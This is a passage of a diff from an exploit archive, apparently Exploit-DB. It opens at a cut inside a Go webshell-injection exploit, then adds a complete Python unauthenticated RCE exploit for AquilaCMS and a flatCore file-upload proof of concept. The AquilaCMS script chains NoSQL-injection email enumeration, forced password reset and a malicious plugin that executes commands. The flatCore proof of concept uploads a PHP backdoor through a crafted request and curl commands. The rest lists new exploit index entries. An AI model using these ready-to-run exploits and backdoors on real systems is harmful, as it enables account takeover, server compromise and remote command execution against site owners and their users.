 	fmt.Println("[+] Generated password to access the webshell: ", password)
 	fmt.Println("[*] Generating JavaScript code to inject webshell...")
 	jsCode := getJsCode(password)
 	payload := generatePayload(jsCode)
 	fmt.Println("[*] Creating malicious post...")
 	postUrl := createPost(editUrl, cookies, payload)
 	if postUrl == "" || postUrl == "/" {
 		fmt.Println("[-] Could not create malicious post, exiting...")
 		return
 	}
 	previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
 	fmt.Println("[+] Malicious post created successfully!")
 	fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
 	fmt.Println("[*] Waiting for the admin to visit the preview URL...")
 	for !checkInjected(targetUrl) {
 		time.Sleep(1 * time.Second)
 	}
 	fmt.Println("[+] Webshell injected successfully!")
 	fmt.Println("[+] Enjoy your shell ;)\n")
 	interactiveShell(targetUrl, password)
 }
--- a/exploits/php/webapps/52164.py
+++ b/exploits/php/webapps/52164.py
@ -0,0 +1,197 @@
 # Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) (Unauthenticated)
 # Date: 2024-10-25
 # Exploit Author: Eui Chul Chung
 # Vendor Homepage: https://www.aquila-cms.com/
 # Software Link: https://github.com/AquilaCMS/AquilaCMS
 # Version: v1.409.20
 # CVE: CVE-2024-48572, CVE-2024-48573
 import io
 import json
 import uuid
 import string
 import zipfile
 import argparse
 import requests
 import textwrap
 def unescape_special_characters(email):
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )
 def get_user_emails():
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
    emails_found = []
    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []
        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)
                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True
            if not found:
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")
    return emails_found
 def reset_password(email):
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    print(f"[+] {unescape_special_characters(email)} : {args.password}")
 def get_admin_auth_token(emails):
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]
    return None
 def create_plugin(plugin_name):
    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");
    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()
    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )
    plugin.seek(0)
    return plugin
 def rce(emails):
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return
    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)
    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
    plugin_id = None
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break
    if plugin_id is None:
        print("[-] Plugin not found")
        return
    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")
 def main():
    print("[*] Retrieve email addresses")
    emails = get_user_emails()
    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)
    print("\n[*] Perform remote code execution")
    rce(emails)
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()
    main()
--- a/exploits/php/webapps/52165.txt
+++ b/exploits/php/webapps/52165.txt
@ -0,0 +1,78 @@
 # Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
 # Date: [2024-10-26]
 # Exploit Author: [CodeSecLab]
 # Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
 # Software Link: [https://github.com/flatCore/flatCore-CMS]
 # Version: [1.5.5]
 # Tested on: [Ubuntu Windows]
 # CVE : [CVE-2019-10652]
 PoC：
 1)
 1. Access the flatCore Admin Panel
 URL: http://flatcore/acp/acp.php
 Log in with valid administrative credentials.
 2. Upload a Malicious PHP File
 Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
 3. Intercept and Modify the Upload Request
 Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
 POST /acp/core/files.upload-script.php HTTP/1.1
 Host: flatcore
 Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
 Content-Length: <calculated length>
 Cookie: PHPSESSID=<valid_session_id>
 -----------------------------735323031399963166993862150
 Content-Disposition: form-data; name="file"; filename="exploit.php"
 Content-Type: application/octet-stream
 <?php
 // Simple PHP backdoor code
 echo "Vulnerable File Upload - PoC";
 system($_GET['cmd']);
 ?>
 -----------------------------735323031399963166993862150
 Content-Disposition: form-data; name="upload_destination"
 ../content/files
 -----------------------------735323031399963166993862150
 Content-Disposition: form-data; name="csrf_token"
 <valid_csrf_token>
 -----------------------------735323031399963166993862150
 Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
 4. Verification
 After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
 Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
 PoC
 2)
 # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
 # Target URL: http://flatcore/
 # The attacker must be authenticated as an administrator to exploit this vulnerability
 # Step 1: Log in as an administrator and obtain the CSRF token
 # You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
 # Step 2: Upload a malicious PHP file using the file upload feature
 # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
 echo "<?php phpinfo(); ?>" > shell.php
 # Upload the PHP file using cURL
 curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@shell.php" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"
 # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
 # Step 3: Access the uploaded malicious PHP file
 echo "Visit the following URL to execute the uploaded PHP file:"
 echo "http://flatcore/content/files/shell.php"
 This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
 [Replace Your Domain Name]
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10397,6 +10397,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-SÃ©bastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
 52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@ -11078,6 +11079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",remote,multiple,,2011-03-29,2011-03-29,0,,,,,,
 25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,,2005-03-07,2013-05-06,1,,,,,,https://www.securityfocus.com/bid/12733/info
 24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/11976/info
 52158,exploits/multiple/remote/52158.py,"K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)",2025-04-10,"M. Akil Gündoğan",remote,multiple,,2025-04-10,2025-04-10,0,CVE-2024-36424,,,,,
 11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple,,2010-03-19,,1,,,,,,
 24414,exploits/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 - Directory Traversal",2004-08-26,"GulfTech Security",remote,multiple,,2004-08-26,2018-01-05,1,"BID: 11057;GTSA-00044",,,,,http://gulftech.org/advisories/Digital%20Media%20Server%20Arbitrary%20File%20Access/44
 20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",remote,multiple,,2000-08-28,2012-08-05,1,OSVDB-84635,,,,,https://www.securityfocus.com/bid/1616/info
@ -11794,6 +11796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",2021-12-16,"Daniel Morales",webapps,multiple,,2021-12-16,2021-12-16,0,CVE-2021-44848,,,,,
 11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-62460;CVE-2010-0642;OSVDB-62459;CVE-2010-0641,,,,,
 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,,2018-03-21,2019-07-25,0,CVE-2018-0114,,,,,https://github.com/zi0Black/POC-CVE-2018-0114/tree/d3bddb421726a9eddbabfd6a1ca58ff4abca93af
 52155,exploits/multiple/webapps/52155.py,"Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover",2025-04-10,"Mohammed Adel",webapps,multiple,,2025-04-10,2025-04-10,0,CVE-2024-20419,,,,,
 37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",webapps,multiple,,2015-08-18,2015-08-18,0,CVE-2014-8008;CVE-2014-6271;OSVDB-126132;OSVDB-126131;OSVDB-117422,,,,,http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
 48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,,2020-10-30,2020-10-30,0,,,,,,
 47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,,2020-01-16,2020-01-16,0,CVE-2019-19781,,,,,
@ -14228,6 +14231,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,webapps,php,,2009-12-29,,0,,,,,,
 12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,webapps,php,,2010-05-10,,0,,,,,,
 8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,webapps,php,,2009-04-13,,1,OSVDB-53691;CVE-2009-1317;OSVDB-53690,,,,,http://crackfor.me/bugtraq/aquacms.v1.1.txt
 52164,exploits/php/webapps/52164.py,"AquilaCMS 1.409.20 - Remote Command Execution (RCE)",2025-04-10,"Eui Chul Chung",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-48573,,,,,
 2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,webapps,php,,2006-12-13,,1,OSVDB-57302;CVE-2006-6590,,,,,
 38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",webapps,php,,2012-11-08,2017-10-20,1,CVE-2012-2437;OSVDB-87922,,,,,https://www.securityfocus.com/bid/56465/info
 27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,webapps,php,,2006-04-14,2013-08-17,1,CVE-2006-1893;OSVDB-24863,,,,,https://www.securityfocus.com/bid/17522/info
@ -15666,6 +15670,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80,2015-09-28,2015-09-28,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
 23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,webapps,php,,2012-12-13,2012-12-13,0,CVE-2012-5967;OSVDB-88430,,,,,
 11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",webapps,php,,2010-03-30,,1,OSVDB-63347;CVE-2010-1301,,,,,
 52156,exploits/php/webapps/52156.py,"Centron 19.04 - Remote Code Execution (RCE)",2025-04-10,"Starry Sky",webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-13024,,,,,
 38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",webapps,php,80,2015-09-02,2015-09-02,0,CVE-2015-6545;OSVDB-126097,,,,http://www.exploit-db.comcerb-7.0.3.tar.gz,https://www.htbridge.com/advisory/HTB23269
 39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,webapps,php,80,2016-03-07,2016-03-10,1,,,,http://www.exploit-db.com/screenshots/idlt40000/kali-20-clean-2016-03-10-19-35-06.png,http://www.exploit-db.comcerb5-5_4_4.zip,
 25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php,,2005-06-08,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13897/info
@ -16195,6 +16200,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80,2018-05-02,2018-05-02,0,CVE-2018-9302,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.comcockpit-0.5.5.tar.gz,
 49390,exploits/php/webapps/49390.txt,"Cockpit CMS 0.6.1 - Remote Code Execution",2021-01-07,"Rafael Resende",webapps,php,,2021-01-07,2021-01-07,0,,,,,,
 3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",webapps,php,,2007-02-01,,1,OSVDB-33095;CVE-2007-0757,,,,,
 52159,exploits/php/webapps/52159.txt,"CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)",2025-04-10,"Raj Nandi",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-7815,,,,,
 3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php,,2007-03-27,,1,OSVDB-35423;CVE-2007-1839;OSVDB-35422,,,,,
 3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php,,2007-04-10,2016-11-14,1,OSVDB-34831;CVE-2007-1996,,,,,
 41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,,2017-03-08,2017-03-08,0,,,,,,
@ -18583,6 +18589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php,,2011-04-01,2011-04-01,1,OSVDB-71472,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
 35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2014-10-23,0,,,,,,
 35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2016-11-12,0,,,,,,https://www.securityfocus.com/bid/47049/info
 52154,exploits/php/webapps/52154.NA,"Feng Office 3.11.1.2 - SQL Injection",2025-04-10,"Andrey Stoykov",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-6039,,,,,
 46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,,2019-02-28,2019-03-08,0,CVE-2019-9623,,,,,
 35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",webapps,php,80,2015-01-26,2015-01-26,1,OSVDB-117806;OSVDB-117612;OSVDB-117533;OSVDB-117532;CVE-2015-1374;CVE-2015-1373;CVE-2015-1372;OSVDB-117531;CVE-2015-1371;OSVDB-117530,,,,,
 10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php,,2009-12-18,,0,,,,,http://www.exploit-db.comfestos_2_2_1.tar.gz,
@ -18683,6 +18690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
 52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
 51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,,,,,http://www.exploit-db.com269_flatfile_login.zip,
@ -25803,6 +25811,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,UNICORD,webapps,php,,2022-06-14,2022-06-14,0,CVE-2020-5844,,,,,
 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,,2020-02-13,2020-02-13,0,CVE-2020-8947,,,,,
 48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,,2020-07-26,2020-07-26,0,CVE-2020-11749,,,,,
 52157,exploits/php/webapps/52157.py,"PandoraFMS 7.0NG.772 - SQL Injection",2025-04-10,"Osama Yousef",webapps,php,,2025-04-10,2025-04-10,0,CVE-2023-44088,,,,,
 48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,,2020-07-26,2020-12-07,0,,,,,,
 25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,webapps,php,,2005-02-16,2013-05-01,1,,,,,,https://www.securityfocus.com/bid/12576/info
 25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,webapps,php,,2005-02-21,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12611/info
@ -31464,6 +31473,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33858,,,,,https://www.securityfocus.com/bid/22799/info
 29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33859,,,,,https://www.securityfocus.com/bid/22799/info
 29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1289;OSVDB-35817,,,,,https://www.securityfocus.com/bid/22799/info
 52161,exploits/php/webapps/52161.go,"Typecho 1.3.0 - Race Condition",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35539,,,,,
 52162,exploits/php/webapps/52162.go,"Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35540,,,,,
 49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
 44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,,2018-02-13,2018-02-13,0,CVE-2018-6889,,,,,
 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,,2020-10-01,2020-10-01,0,,,,,,